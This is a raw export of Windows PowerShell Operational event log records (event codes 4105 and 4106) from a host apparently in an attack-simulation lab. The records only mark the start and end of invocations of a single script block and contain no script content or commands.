SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472818
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472817
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472816
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472815
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472814
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472813
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472812
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472811
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472810
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472809
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472808
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472807
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472806
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472805
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472804
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472803
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472802
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472801
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472800
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472799
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472798
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472797
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472796
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472795
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472794
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472793
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472792
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472791
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472790
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472789
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472788
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472787
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472786
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472785
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472784
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472783
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472782
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472781
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472780
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472779
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472778
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472777
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472776
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472775
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472774
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472773
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472772
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472771
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472770
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472769
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472768
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472767
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472766
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472765
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472764
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
